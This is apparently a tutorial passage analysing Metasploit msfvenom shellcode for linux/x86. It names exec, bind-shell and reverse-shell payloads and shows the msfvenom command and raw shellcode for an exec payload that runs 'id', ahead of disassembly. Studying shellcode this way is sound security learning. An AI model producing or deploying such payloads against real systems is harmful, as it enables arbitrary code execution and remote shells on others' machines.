Today I will analyze the following shellcode generated by the msfvenom, specifically in linux/x86:
linux/x86/exec — Execute an arbitrary command
linux/x86/shell_bind_tcp — Listen for a connection and spawn a command shell
linux/x86/shell_reverse_tcp — Connect back to attacker and spawn a command shell
1) linux/x86/exec
This msfvenom will execute an arbitrary command that you add while creating a payload. Let’s create the payload with the linux command id.
# msfvenom -p linux/x86/exec CMD=id -f c [-] No platform was selected, choosing Msf::Module::Platform::Linux from the payload [-] No arch selected, selecting arch: x86 from the payload No encoder specified, outputting raw payload Payload size: 38 bytes Final size of c file: 185 bytes unsigned char buf[] = "\x6a\x0b\x58\x99\x52\x66\x68\x2d\x63\x89\xe7\x68\x2f\x73\x68" "\x00\x68\x2f\x62\x69\x6e\x89\xe3\x52\xe8\x03\x00\x00\x00\x69" "\x64\x00\x57\x53\x89\xe1\xcd\x80";
Then, we will use ndisasm - the Netwide Disassembler - to disassemble the created shellcode.
